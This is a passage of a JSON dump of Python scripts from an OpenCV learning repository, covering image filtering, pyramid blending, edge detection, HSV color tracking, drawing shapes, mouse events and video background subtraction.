[ { "alpha_fraction": 0.71875, "alphanum_fraction": 0.71875, "avg_line_length": 33.28571319580078, "blob_id": "cd307ee9006a60c503f57067aada3e8ea27f28e9", "content_id": "287b4e276819da2e02eb368578538495dedbf8e9", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 960, "license_type": "no_license", "max_line_length": 101, "num_lines": 28, "path": "/README.md", "repo_name": "Aeres-u99/Linux-Quotes", "src_encoding": "UTF-8", "text": "### Linux Quotes Bot\nIts a simple bot that modified certain keywords from a quote and generates \"Linux\" themed quotes, \nThe quotes is from famous people except it isnt. These are fake quotes for fun purposes, feel free to\nadd it into your group and laugh out loud. \n\n\n#### FAQ\n* How can I add my quote? \n \n Just send a pr for quote.csv, it will be added\n* How can I add more keywords?\n \n Please modify quoter.py, it has all that you will need. \n* How can I add more tags? \n \n Same, quoter.py\n* Why do you use botogram? \n \n I use what I like. Please recreate one for yourself if you arent comfy, feel free to fork. \n* I have a very interesting idea of xyz feature\n \n Sure it must be amazing, but this is going to stay barebones\n* Why not fetch quotes from internet and modify them? \n \n Well, that \"might\" get implemented (or it may never, trust me idk about my schedule either)\n* Can i add it into my group? \n \n Sure, but please host it yourself.\n" }, { "alpha_fraction": 0.5704681873321533, "alphanum_fraction": 0.5723889470100403, "avg_line_length": 52.371795654296875, "blob_id": "b0f6afdf1a0a2bf495bcb944731eb8934a9b8a1a", "content_id": "8c9373d8141a8c4fde273abb512887f8f1b4b90d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4165, "license_type": "no_license", "max_line_length": 352, "num_lines": 78, "path": "/quoter.py", "repo_name": "Aeres-u99/Linux-Quotes", "src_encoding": "UTF-8", "text": "#!/bin/env python3\nimport csv\nimport random\ndef replaceWords():\n replacement_dictionary = {\n \"failed\":['broken my system','fucked up linux','borked my machine'],\n \"battles\":['Linux system','Fight about Inits','Emacs vs Vim'],\n \"medals\":['glories','stars','pull requests'],\n \"test\":['unit tests','testing scripts','test cases'],\n \"fail\":['failed at compiling','break','berakdown'],\n \"machine\":['linux system machine','linux based machine','linux based'],\n \"airplane\":['linux kernel','linux sysfs','linux procfs'],\n \"you\":['user','programmer','hacker'],\n \"your\":['user\\'s','programmer\\'s','hacker\\'s'],\n \"reading\":['inspecting','read operation','read action'],\n \"writing\":['Saving to disk','Saving to ram','accessing from ram'],\n \"door\":['back door','vulnerability','bug'],\n \"passion\":['love for linux','hacking','coding'],\n \"devoid\":['without','nullified','messed'],\n \"nothing\":['null','void','/dev/null'],\n \"impossible!\":['tiny kernel','bloat free','null zero'],\n \"possible\":['bloated','heavy','could happen'],\n \"that\":['system','server','machine'],\n \"if\":['conditional','switch case','possibility'],\n \"person\":['expert','deccent user','hacker'],\n \"someone\":['X','/dev/xyz device','some user'],\n \"children\":['Process child\\'s','process','thread'],\n \"everything\":['world repository','system repostory','git world repo'],\n \"learned\":['pro','stallman','original hackers'],\n \"disappointed\":['systemd','init','X server'],\n \"always\":['Infinite times','Forever','Never Ending'],\n 
\"life\":['linux','linux system','kernel'],\n \"dream\":['hack','mess with it','fuck it'],\n \"work\":['hack','code','rice'],\n \"roads\":['source code','compilers','roads'],\n \"traveled\":['played with','hacked on','traveled'],\n \"decision\":['distro to choose','kernel','bsd'],\n \"capitalism\":['kernel','linux','FOSS development'],\n \"happens\":['breaks','creates','crashes'],\n \"plant\":['choose a distro','read code','plant'],\n \"unexamined\":['life without','life without ','Arch based'],\n \"success\":['rice','source code','code readability'],\n \"Winning\":['Kernel Hack','Using Linux','FOSS development'],\n \"win\":['successful compilaton',\"gentoo\",\"LFS\"],\n \"child\":['n00b','newbie','begginer'],\n \"ocean\":['source code','binary file',\"ocean of code\"],\n \"cross\":['read','hack','play with'],\n \"day\":['code','binary','assembly'],\n \"forget\":['distro hop','use systemd','sysvinit'],\n \"born\":['given for free','you have stolen','linux user'],\n \"revenge\":['virus','bug','hack'],\n \"motivation\":['desire to gentoo','using arch linux','loving FOSS'],\n \"nothing\":['coding','playing','hacking'],\n \"criticism\":['bug','hack','malware'],\n \"confidently\":['with bugs','life with coke','coffee']\n }\n tags = ['Distro Hopper','Kernel hacker','FOSS lover','Gentoo user (I burnt my weewee compiling kernel)','Arch (I use arch btw)','LFS hacker (I have no need for package manager)','Gnome Developer (We break freely)','Debian Maintainer (README is for noobs)','Debian Maintainer (We hate systemd)','Systemd lover (I am the best, your opinion is shit)']\n \n \n with open('quotes.csv', 'r') as quotes:\n reader = csv.reader(quotes)\n quote = random.choice(list(reader))\n words = quote[0].split(\" \")\n words = [word.lower() for word in words]\n flag = False\n for word in words:\n if word in replacement_dictionary.keys():\n flag = True\n modified_words = [replacement_dictionary[word][random.randint(0,2)] if x == word else x for x in words]\n author = quote[1] + \" \"\n author += random.choice(tags)\n if not flag:\n author = quote[1]\n modified_words = words\n keyquote = \" \".join(modified_words).capitalize()\n keyauthor = author\n string_output = keyquote + \"\\n --\" + keyauthor\n return string_output\n\n\n" }, { "alpha_fraction": 0.683080792427063, "alphanum_fraction": 0.6868686676025391, "avg_line_length": 28.296297073364258, "blob_id": "4a7cd2e52d73c01fcd84b4d4826855ebdf466a22", "content_id": "2c8b4b7ee934339b7d7211196386112ff1b06c36", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 792, "license_type": "no_license", "max_line_length": 159, "num_lines": 27, "path": "/pybot.py", "repo_name": "Aeres-u99/Linux-Quotes", "src_encoding": "UTF-8", "text": "#!/bin/env python3\nfrom quoter import replaceWords\nimport botogram\nbot = botogram.create(\"your api key here\")\nbot.owner = \"KeiTachikawa on telegram, aeres99[at]gmail.com\"\nbot.after_help = [\n \"This bot simply gives new random quotes.\",\n]\n\n\[email protected](\"hello\")\ndef hello_command(chat,message, args):\n \"\"\"This basically says hello, and tells about the bot. Its goal and purpose\"\"\"\n chat.send(\"Hello, I am linux quotes bot. 
Please note none of these quotes are real, they are made for fun and no cute animals were harmed in its creation\")\n\[email protected](\"new\")\ndef new_command(chat,message, args):\n \"\"\"Send in the new random quote!\"\"\"\n output_quote = replaceWords()\n print(\"*\"*10)\n print(output_quote)\n chat.send(output_quote)\n\n\n\nif __name__ == \"__main__\":\n bot.run()\n\n" } ]
3
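quoter.py above reads quotes.csv with column 0 holding the quote text and column 1 the author. A small sketch of seeding that file in the expected layout (the rows are illustrative data, not shipped with the bot):

import csv

rows = [
    ["Life is what happens when you are busy making other plans.", "John Lennon"],
    ["Choose a job you love and you will never have to work a day in your life.", "Confucius"],
]
with open("quotes.csv", "w", newline="") as f:
    # Each row matches quoter.py's expectation: quote[0] is the text and
    # quote[1] the author; keywords like "life" and "work" will get swapped.
    csv.writer(f).writerows(rows)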
jzjosuerivera71/SIMPy
https://github.com/jzjosuerivera71/SIMPy
557c1758fc9604d5e963dbdc1f27f0f45692eaac
56b09e00592ce7c13dc5497c06b2896ff46f3638
24d2f076946ea2c9ea038ab92f03f7b9adbaf434
refs/heads/master
2021-05-26T15:24:02.282167
2013-09-27T12:08:29
2013-09-27T12:08:29
null
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.5905796885490417, "alphanum_fraction": 0.6277173757553101, "avg_line_length": 25.285715103149414, "blob_id": "5fdce670ab059762d8a84ab12c0ade93687556c2", "content_id": "b5fcbaba6a27395c97c37c7a767088741801b6ae", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1104, "license_type": "no_license", "max_line_length": 73, "num_lines": 42, "path": "/test.py", "repo_name": "jzjosuerivera71/SIMPy", "src_encoding": "UTF-8", "text": "from scipy import sparse as sp\nfrom scipy.sparse.linalg import spsolve\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport SIMPy\n\n##################\n# Pousuille flow #\n##################\n\nN = 10 # problem size\ntol = 1e-4 # tolerance for solution\nimax = 1000 # max number of iterations\nmethod = \"SOR\" # SIM method\nomega = 1.2 # factor for SOR\nx = np.zeros(N) # starting guess for solution\nz = np.linspace(0, 1, N) # generate grid\n\n# Assemble tri-diagonal system matrix for CDS operator\ndata = np.zeros((3, N))\ndata[0, 0:N-1] = 1 # super diagonal\ndata[1, :] = -2 # diagonal\ndata[2, 1:N] = 1 # sub diagonal\noffsets = np.array([-1, 0, 1])\nA = sp.spdiags(data, offsets, N, N, format=\"csc\")\n\n# Assemble source vector\nb = np.zeros(N)\nb[1:N] = -8/(N-1) ^ 2\n\nu1 = spsolve(A, b) # direct solution\nu2, _, iter, _, G = SIMPy.solve(A, b,\n \"sor\", 500, 1e-4, 1, np.ones(N), False) # iterative solution\n\n## Plotting\nplt.plot(u1, z, '--o', linewidth=2, label=\"direct solution\")\nplt.plot(u2, z, '--o', linewidth=2, label=\"iterative solution\")\nplt.legend()\nplt.show()\nplt.ion()\n\nprint(\"done!\")\n" }, { "alpha_fraction": 0.5807228684425354, "alphanum_fraction": 0.5948100090026855, "avg_line_length": 34.728477478027344, "blob_id": "a9ec83f1ea4cca460e28043222f26b6f971be679", "content_id": "65015b0704718c06b55b81ac01289837472c3ac6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5395, "license_type": "no_license", "max_line_length": 77, "num_lines": 151, "path": "/SIMPy.py", "repo_name": "jzjosuerivera71/SIMPy", "src_encoding": "UTF-8", "text": "import numpy as np\nfrom scipy import sparse as sp\nfrom scipy.sparse.linalg import spsolve\n\n\ndef my_diag(A):\n \"\"\"\n Extraction of diag from a sparse matrix.\n \"\"\"\n\n N = np.size(A, 1) # get number of diag elements = num colums\n ii = np.arange(0, N) # create seq of int from 1 to N\n return A[ii, ii]\n\n\ndef solve(A, b, *vartuple):\n \"\"\"\n Solves system of linear equations A*x=b using a stationary iterative\n method. Terminates after maximum imax iterations, or when the inf-norm\n of the residual, relative the inf-norm of the initial residual, becomes\n less than tol. The following stationary iterative methods are\n implemented: Jacobi, Gauss-Seidel, SOR.\n\n Syntax:\n -------\n x,error,iter,flag,G = SIMPy(A, b, method, imax, tol, omega, x, reqG)\n\n Input :\n -----\n A : system matrix\n b : right hand side vector (default init. with zero-vector)\n method : SIM, \"jacobi\",\"gs\",\"sor\" (delfault method is jacobi)\n imax : maximum number of iterations (default is number of equations)\n tol : tolerance on residual, relative to initial residual (sqrt(eps))\n omega : SOR-relaxation parameter, 0 <= omega < 2 (defualt 1)\n x0 : initial guess vector\n reqG : request G, => True or False (default False)\n\n Output :\n ------\n x : solution to A*x = b (converged)\n error : history of inf-norm of residual normed w.r.t. 
initial residual\n iter : number of iterations to reach converged solution\n flag : convergence flag (0: solution converged, 1: no convergence)\n G : iteration matrix (expensive! - don\"t request unless needed)\n\n Note :\n ----\n SIMPy is a python \"conversion\" of handout material from DTU course 41319\n\n \"\"\"\n\n # Set default input, if arguments are not given\n nvargin = len(vartuple) # determine number of variable input arguments\n\n if nvargin < 6: # reqG undefined\n reqG = False # default 0 = no\n else:\n reqG = vartuple[5]\n if nvargin < 5: # x0 undefined\n x = 0*b # default init. with zero-vector\n else:\n x = vartuple[4]\n if nvargin < 4: # omega undefined\n omega = 1 # default omega, sor=>gs\n else:\n omega = vartuple[3]\n if nvargin < 3: # tol undefined\n tol = np.sqrt(np.spacing(1)) # default tol\n else:\n tol = vartuple[2]\n if nvargin < 2: # imax undefined\n imax = np.size(A, 0) # default imax\n else:\n imax = vartuple[1]\n if nvargin < 1: # method undefined\n method = \"jacobi\" # delfault method\n else:\n method = vartuple[0]\n\n # Compute initial residual vector and norm\n returnflag = 0 # initialize flag for early function return\n rhsInorm = np.linalg.norm(b, np.inf) # Inf-norm of rhs-vectorhon\n\n if rhsInorm == 0: # homogene problem, x = b = 0\n x = b # homogene solution\n error0 = 0 # zero error\n returnflag = 1 # return function\n else: # inhomogene problem, non-zero rhs vector\n if np.linalg.norm(x, np.inf) == 0: # zero initial guess\n res = rhsInorm # norm of residual vector\n error0 = 1 # relative error\n else: # non-zero initial guess\n r = b - A*x # initial residual vector\n res = np.linalg.norm(r, np.inf) # norm of residual vector\n error0 = res/rhsInorm # relative error for initial guess\n if error0 <= tol: # initial error less than tolerance\n returnflag = 1 # return function\n res0 = res # ini. res. - stored for error computation\n\n # Matrix splitting based on \"method\" input\n if method.lower() == \"jacobi\": # jacobi splitting\n w = 1\n M = sp.spdiags(my_diag(A), 0, np.size(A, 0), np.size(A, 1))\n N = M-A\n elif method.lower() == \"gs\": # gauss-seidel splitting\n w = 1\n M = sp.tril(A, 0)\n N = M-A\n elif method.lower() == \"sor\": # SOR splitting\n w = omega\n diagV = my_diag(A) # extract diagonal of sparse matrix\n M = sp.spdiags(diagV, 0, np.size(A, 0), np.size(A, 1)) \\\n + w*sp.tril(A, -1)\n N = (1-w)*sp.spdiags(diagV, 0, np.size(A, 0), np.size(A, 1)) \\\n - w*sp.triu(A, 1)\n\n # Compute iteration matrix if requested as output (expensive!)\n G = 0 # set default return value for G\n if reqG: # iteration matrix requested\n print(np.shape(M))\n print(np.shape(N))\n G = spsolve(M, N, None, False) # iteration matrix\n\n # Return function\n if returnflag == 1:\n iter = 0\n flag = 0\n return x, error0, 0, flag, G\n\n # Iterate till error < tol\n iter = 0 # initialize iteration counter\n error = np.zeros(imax+1) # vector to hold iteration error history\n error[0] = error0\n\n while iter < imax and error[iter] > tol:\n iter = iter+1 # update iteration counter\n x = spsolve(M, N*x+w*b) # update approximation\n r = b - A*x # residual vector\n res = np.linalg.norm(r, np.inf) # norm of residual vector\n error[iter] = res/res0 # relative error\n\n error = error[0:iter+1] # remove undone iterations from error\n\n # Check for final convergence\n if (error[iter] > tol): # no convergence\n flag = 1 # failed convergence flag\n else: # solution converged\n flag = 0 # convergence flag\n\n return x, error, iter, flag, G\n" } ]
2
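A note on the splitting that SIMPy.solve relies on: each method rewrites A = M - N and iterates x <- M^{-1}(N*x + w*b) until the relative residual drops below tol. A minimal standalone sketch of the Jacobi case follows; the 2x2 system is illustrative only, not taken from the repo.

import numpy as np
from scipy import sparse as sp
from scipy.sparse.linalg import spsolve

A = sp.csc_matrix(np.array([[4.0, 1.0], [2.0, 5.0]]))  # diagonally dominant
b = np.array([1.0, 2.0])

M = sp.diags(A.diagonal()).tocsc()  # Jacobi: M is the diagonal of A
N = M - A                           # remainder, so that A = M - N

x = np.zeros(2)                     # zero initial guess, as in SIMPy.solve
for _ in range(50):
    x = spsolve(M, N @ x + b)       # fixed-point step x <- M^{-1}(N x + b)

print(np.allclose(A @ x, b))        # True: the iteration has converged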
feniltailor22/Computer_Vision
https://github.com/feniltailor22/Computer_Vision
78bf9917e2e51a16346b40aa9fc55e7b357bb698
55347527b516b033e15386cd191abb9263eb71cf
65038d038dfbd7c24ee46d2a1269807963a5bb8b
refs/heads/main
2023-08-22T13:54:51.317029
2021-10-23T04:37:14
2021-10-23T04:37:14
392,042,028
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.669284462928772, "alphanum_fraction": 0.7024433016777039, "avg_line_length": 28.210525512695312, "blob_id": "00650bbd43a3ecf37f21c3dac0003d92db493267", "content_id": "1b6aceb2f1a9029924f9db31f4a6f05bf3985e4b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1146, "license_type": "no_license", "max_line_length": 83, "num_lines": 38, "path": "/Smoothing or Blurring Images.py", "repo_name": "feniltailor22/Computer_Vision", "src_encoding": "UTF-8", "text": "import numpy as np\r\nimport cv2\r\nimport matplotlib.pyplot as plt\r\nfrom numpy.core.fromnumeric import size\r\n\r\nimg= cv2.imread('lena.jpg',1)\r\nimg= cv2.cvtColor(src= img, code=cv2.COLOR_BGR2RGB)\r\n\r\n#Homogeneous Filter\r\nkernel= np.ones((5,5), np.float32)/25\r\ndst= cv2.filter2D(src=img, ddepth=-1, kernel=kernel)\r\n\r\n#Average filter/Low Pass Filter helps in removing noises, blurring the images.\r\nblur= cv2.blur(src=img, ksize=(5,5))\r\n\r\n#High Pass Filter helps in finding edges in the images.\r\ngblur= cv2.GaussianBlur(src=img, ksize=(5,5), sigmaX=0)\r\n\r\n#Median filter is used to remove sal and paper noise from the image.\r\nmedian= cv2.medianBlur(src=img, ksize=5)\r\n\r\n#Bilateral filter remove noise while preserving border precisely. \r\nbilateral= cv2.bilateralFilter(src=img, d=9, sigmaColor=75, sigmaSpace=75)\r\n\r\ntitles= ['image', '2D Convolution', 'blur', 'gaussian blur', 'median', 'bilateral']\r\nimages= [img, dst, blur, gblur, median, bilateral]\r\n\r\nfor i in range(6):\r\n plt.subplot(3,3,i+1)\r\n plt.imshow(images[i],'gray')\r\n plt.title(titles[i])\r\n plt.xticks([])\r\n plt.yticks([])\r\n\r\nplt.show()\r\n\r\ncv2.waitKey(0)\r\ncv2.destroyAllWindows()" }, { "alpha_fraction": 0.6919274926185608, "alphanum_fraction": 0.7133443355560303, "avg_line_length": 30.373332977294922, "blob_id": "421bdf25f70747ad912f3d5176ceb3e8542653d7", "content_id": "167710f772a8594898643b73971b8f4181030c1a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2428, "license_type": "no_license", "max_line_length": 102, "num_lines": 75, "path": "/Image Blending Using Pyramid.py", "repo_name": "feniltailor22/Computer_Vision", "src_encoding": "UTF-8", "text": "#Image Blending Method have five steps:\r\n#(i) Load Two Images(same size) that you want to Blend.\r\n#(ii) Find the Gaussian Pyramids for both of the Images.\r\n#(iii) From Gaussian Pyramids, find their Laplacian Pyramids.\r\n#(iv) Now join the left half of Image-1 and right half of Image-2 in each level of Laplacian Pyramids.\r\n#(v) Finally from this joint image pyramids, reconstruct the original image.\r\n\r\nimport numpy as np\r\nimport cv2\r\n\r\napple= cv2.imread('apple.jpg',1)\r\norange= cv2.imread('orange copy.jpg',1)\r\n\r\nprint(apple.shape)\r\nprint(orange.shape)\r\n\r\n#Half Apple and Half Orange in one Image without Blending\r\napple_orange= np.hstack((apple[:, :256],orange[:, 256:]))\r\n\r\n#Generate Gaussian Pyramids for Apple\r\napple_layer= apple.copy()\r\ngp_apple= [apple_layer]\r\n\r\nfor i in range(6):\r\n apple_layer= cv2.pyrDown(apple_layer)\r\n gp_apple.append(apple_layer)\r\n\r\n#Generate Gaussian Pyramids for Orange\r\norange_layer= orange.copy()\r\ngp_orange= [orange_layer]\r\n\r\nfor i in range(6):\r\n orange_layer= cv2.pyrDown(orange_layer)\r\n gp_orange.append(orange_layer)\r\n\r\n#Generate Laplacian Pyramids for Apple\r\napple_layer= gp_apple[5]\r\nlp_apple= [apple_layer]\r\n\r\nfor i in range(5, 0, -1):\r\n 
gaussian_extended_apple= cv2.pyrUp(gp_apple[i])\r\n laplacian= cv2.subtract(src1=gp_apple[i-1], src2=gaussian_extended_apple)\r\n lp_apple.append(laplacian)\r\n\r\n#Generate Laplacian Pyramids for Orange\r\norange_layer= gp_orange[5]\r\nlp_orange= [orange_layer]\r\n\r\nfor i in range(5, 0, -1):\r\n gaussian_extended_orange= cv2.pyrUp(gp_orange[i])\r\n laplacian= cv2.subtract(src1=gp_orange[i-1], src2=gaussian_extended_orange)\r\n lp_orange.append(laplacian)\r\n\r\n#Now add left and right halves of images in each level\r\napple_orange_pyramid=[]\r\nn=0\r\nfor apple_lap, orange_lap in zip(lp_apple, lp_orange):\r\n n+=1\r\n rows, cols, ch= apple_lap.shape #shape is (rows, cols, channels)\r\n laplacian= np.hstack((apple_lap[:, 0:int(cols/2)], orange_lap[:, int(cols/2):]))\r\n apple_orange_pyramid.append(laplacian)\r\n\r\n#Now reconstruct\r\napple_orange_reconstruct= apple_orange_pyramid[0]\r\nfor i in range(1,6):\r\n apple_orange_reconstruct= cv2.pyrUp(apple_orange_reconstruct)\r\n apple_orange_reconstruct= cv2.add(apple_orange_pyramid[i], apple_orange_reconstruct)\r\n\r\ncv2.imshow('apple',apple)\r\ncv2.imshow('orange',orange)\r\ncv2.imshow('apple_orange',apple_orange)\r\ncv2.imshow('apple_orange_reconstruct',apple_orange_reconstruct)\r\n\r\ncv2.waitKey(0)\r\ncv2.destroyAllWindows()\r\n" }, { "alpha_fraction": 0.6328871846199036, "alphanum_fraction": 0.6634799242019653, "avg_line_length": 21.863636016845703, "blob_id": "eb67524f524fccf039b1e0ed9dd27ff1f31a452f", "content_id": "4532494925c4f28c8bef180edf511e06c0ceb2c1", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 523, "license_type": "no_license", "max_line_length": 108, "num_lines": 22, "path": "/Image Uploading and Saving.py", "repo_name": "feniltailor22/Computer_Vision", "src_encoding": "UTF-8", "text": "import cv2\r\n\r\nimg= cv2.imread('lena.jpg',0)\r\n# IMREAD_UNCHANGED = -1,\r\n# IMREAD_GRAYSCALE = 0,\r\n# IMREAD_COLOR = 1\r\n\r\n#Printing image in pixel values\r\nprint(img)\r\n\r\ncv2.imshow('image', img)\r\n\r\n#waitKey(0) keeps the window open until a key is pressed.\r\n\r\nk= cv2.waitKey(0)\r\n\r\n#Press the Esc key (27) to close without saving, or the 's' key to save a copy of the image:\r\nif k == 27:\r\n cv2.destroyAllWindows()\r\nelif k == ord('s'):\r\n cv2.imwrite('lena_copy.jpg',img)\r\n cv2.destroyAllWindows()" }, { "alpha_fraction": 0.6563916802406311, "alphanum_fraction": 0.6890299320220947, "avg_line_length": 25.625, "blob_id": "4a3c15128b0de7154518ad2b0541a9181d1d7d90", "content_id": "992152d092bc263e6ec95cfd7838fa684c9cf55c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1103, "license_type": "no_license", "max_line_length": 85, "num_lines": 40, "path": "/Edge Detection using Image Gradient.py", "repo_name": "feniltailor22/Computer_Vision", "src_encoding": "UTF-8", "text": "#An Image Gradient is a directional change in the intensity or color in an Image. 
\r\n#It is used to detect the Edges in the Images.\r\n\r\nimport numpy as np\r\nimport cv2\r\nimport matplotlib.pyplot as plt\r\n\r\nimg= cv2.imread('sudoku.png',0)\r\n\r\n#Laplacian Gradient\r\nlap= cv2.Laplacian(src=img, ddepth=cv2.CV_64F, ksize=3)\r\n#cv2.CV_64F keeps the negative values that the Laplacian Gradient produces.\r\nlap= np.uint8(np.abs(lap))\r\n\r\n#SobelX (Order of derivative X)\r\nSobelX= cv2.Sobel(src=img, ddepth=cv2.CV_64F, dx=1, dy=0)\r\nSobelX= np.uint8(np.abs(SobelX))\r\n\r\n#SobelY (Order of derivative Y)\r\nSobelY= cv2.Sobel(src=img, ddepth=cv2.CV_64F, dx=0, dy=1)\r\nSobelY= np.uint8(np.abs(SobelY))\r\n\r\n#Combining SobelX and SobelY\r\nSobelComb= cv2.bitwise_or(src1=SobelX, src2=SobelY)\r\n\r\n\r\ntitles= ['image', 'Laplacian', 'SobelX', 'SobelY', 'Sobel Combined']\r\nimages= [img, lap, SobelX, SobelY, SobelComb]\r\n\r\nfor i in range(5):\r\n plt.subplot(2,3,i+1)\r\n plt.imshow(images[i],'gray')\r\n plt.title(titles[i])\r\n plt.xticks([])\r\n plt.yticks([])\r\n\r\nplt.show()\r\n\r\ncv2.waitKey(0)\r\ncv2.destroyAllWindows()" }, { "alpha_fraction": 0.6082234382629395, "alphanum_fraction": 0.6524437665939331, "avg_line_length": 28.023256301879883, "blob_id": "574e83cfaf4630606c96a5c1430fbdbacb5230d9", "content_id": "662a3e257672b249bca0178ef4c4a005a11dc6e0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1289, "license_type": "no_license", "max_line_length": 58, "num_lines": 43, "path": "/Object Detection and Object Tracking Using HSV Color Space.py", "repo_name": "feniltailor22/Computer_Vision", "src_encoding": "UTF-8", "text": "import numpy as np\r\nimport cv2\r\n\r\ndef nothing(x):\r\n pass\r\n\r\ncv2.namedWindow('Tracking')\r\ncv2.createTrackbar('LH','Tracking',0,255,nothing)\r\ncv2.createTrackbar('LS','Tracking',0,255,nothing)\r\ncv2.createTrackbar('LV','Tracking',0,255,nothing)\r\ncv2.createTrackbar('UH','Tracking',255,255,nothing)\r\ncv2.createTrackbar('US','Tracking',255,255,nothing)\r\ncv2.createTrackbar('UV','Tracking',255,255,nothing)\r\n\r\nwhile(True):\r\n frame= cv2.imread('smarties.png')\r\n\r\n hsv= cv2.cvtColor(frame,cv2.COLOR_BGR2HSV)\r\n\r\n l_h= cv2.getTrackbarPos('LH','Tracking')\r\n l_s= cv2.getTrackbarPos('LS','Tracking')\r\n l_v= cv2.getTrackbarPos('LV','Tracking')\r\n u_h= cv2.getTrackbarPos('UH','Tracking')\r\n u_s= cv2.getTrackbarPos('US','Tracking')\r\n u_v= cv2.getTrackbarPos('UV','Tracking')\r\n\r\n #Getting lower & upper color range to use it in a mask\r\n lower_bound= np.array([l_h, l_s, l_v])\r\n upper_bound= np.array([u_h, u_s, u_v])\r\n\r\n #Getting mask of above color range from the image\r\n mask= cv2.inRange(hsv, lower_bound, upper_bound)\r\n\r\n result= cv2.bitwise_and(frame,frame, mask=mask) \r\n\r\n cv2.imshow('frame',frame)\r\n cv2.imshow('mask',mask)\r\n cv2.imshow('result',result)\r\n\r\n if cv2.waitKey(1) & 0xFF== ord('q'):\r\n break\r\n\r\ncv2.destroyAllWindows()" }, { "alpha_fraction": 0.5774155855178833, "alphanum_fraction": 0.6891734600067139, "avg_line_length": 33.79166793823242, "blob_id": "b1f2ecc4b767e0a3ed06d1a6f2f44806202e072c", "content_id": "e594e26847e5188e0ea5a1e3a0e4aae5ce62720a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 859, "license_type": "no_license", "max_line_length": 153, "num_lines": 24, "path": "/Draw geometric shapes on images.py", "repo_name": "feniltailor22/Computer_Vision", "src_encoding": "UTF-8", "text": "import cv2\r\n\r\nimg= 
cv2.imread('lena.jpg',1)\r\n\r\n#Drawing straight line in an image:\r\nimg= cv2.line(img, pt1=(0,0), pt2=(255,255), color=(25,32,130), thickness=5)\r\n#For a customized color, pick an RGB value with any color picker and supply it in BGR order\r\n\r\n#Drawing arrowed line in an image:\r\nimg= cv2.arrowedLine(img, (0,255), (255,255), (255,0,0), 5)\r\n\r\n#Drawing rectangle in an image:\r\nimg= cv2.rectangle(img, pt1=(384,0), pt2=(510,128), color=(0,255,0), thickness=5)\r\n\r\n#Drawing circle in an image:\r\nimg= cv2.circle(img, center=(280,125), radius=60, color=(0,0,255), thickness=5)\r\n\r\n#Adding Text in an image:\r\nimg= cv2.putText(img, text='Lena', org=(10,500), fontFace=cv2.FONT_HERSHEY_COMPLEX, fontScale=4, lineType= cv2.LINE_AA, color=(255,255,255), thickness=5)\r\n\r\ncv2.imshow('image',img)\r\n\r\ncv2.waitKey(0)\r\ncv2.destroyAllWindows()\r\n" }, { "alpha_fraction": 0.5226536989212036, "alphanum_fraction": 0.5744336843490601, "avg_line_length": 24.83333396911621, "blob_id": "03c3bac44a9d0e149ed1b78b998841af00c8e111", "content_id": "51d732fd52cc71bd437be82f921f0e7f3eebdafe", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 618, "license_type": "no_license", "max_line_length": 53, "num_lines": 24, "path": "/Mouse Events 3.0.py", "repo_name": "feniltailor22/Computer_Vision", "src_encoding": "UTF-8", "text": "import numpy as np\r\nimport cv2\r\n\r\ndef click_event(event, x, y, flags, param):\r\n if event == cv2.EVENT_LBUTTONDOWN:\r\n blue= img[y,x,0]\r\n green= img[y,x,1]\r\n red= img[y,x,2]\r\n cv2.circle(img, (x, y), 3, (0,0,255), -1)\r\n mycolorimage= np.zeros((512,512,3), np.uint8)\r\n \r\n mycolorimage[:]= [blue, green, red]\r\n \r\n cv2.imshow('color', mycolorimage)\r\n \r\nimg= cv2.imread('lena.jpg',1)\r\ncv2.imshow('image',img)\r\npoints= []\r\n\r\ncv2.setMouseCallback('image', click_event)\r\n\r\ncv2.waitKey(0)\r\ncv2.imwrite('lena_mouse_events_3.0.jpg',img)\r\ncv2.destroyAllWindows()" }, { "alpha_fraction": 0.6877990365028381, "alphanum_fraction": 0.7117224931716919, "avg_line_length": 26.827587127685547, "blob_id": "b0ebb05d4b04f494c5d34dd7cfedf46fe0ab0efb", "content_id": "2ced9b1e7b5f7e99c22e7b2138996ee13245e7b4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 836, "license_type": "no_license", "max_line_length": 108, "num_lines": 29, "path": "/Background Subtraction in a video.py", "repo_name": "feniltailor22/Computer_Vision", "src_encoding": "UTF-8", "text": "import cv2\r\nimport numpy as np\r\n\r\ncap=cv2.VideoCapture('vtest.avi')\r\n\r\n#createBackgroundSubtractorMOG2 is a Gaussian Mixture-based Background/Foreground segmentation algorithm.\r\nfgbg1= cv2.createBackgroundSubtractorMOG2()\r\n\r\n#createBackgroundSubtractorKNN is a K-nearest neighbours-based Background/Foreground segmentation algorithm.\r\nfgbg2= cv2.createBackgroundSubtractorKNN(detectShadows=False)\r\n\r\nwhile True:\r\n ret, frame= cap.read()\r\n if frame is None:\r\n break\r\n\r\n #Applying background subtraction method on frame \r\n fgmask1= fgbg1.apply(frame) \r\n fgmask2= fgbg2.apply(frame) \r\n\r\n cv2.imshow('Frame', frame)\r\n cv2.imshow('GMM FG Mask Frame', fgmask1)\r\n cv2.imshow('KNN FG Mask Frame', fgmask2)\r\n\r\n if cv2.waitKey(1) & 0xFF == ord('q'):\r\n break\r\n\r\ncap.release()\r\ncv2.destroyAllWindows()\r\n" }, { "alpha_fraction": 0.5625841021537781, "alphanum_fraction": 0.6137281060218811, "avg_line_length": 19.285715103149414, "blob_id": 
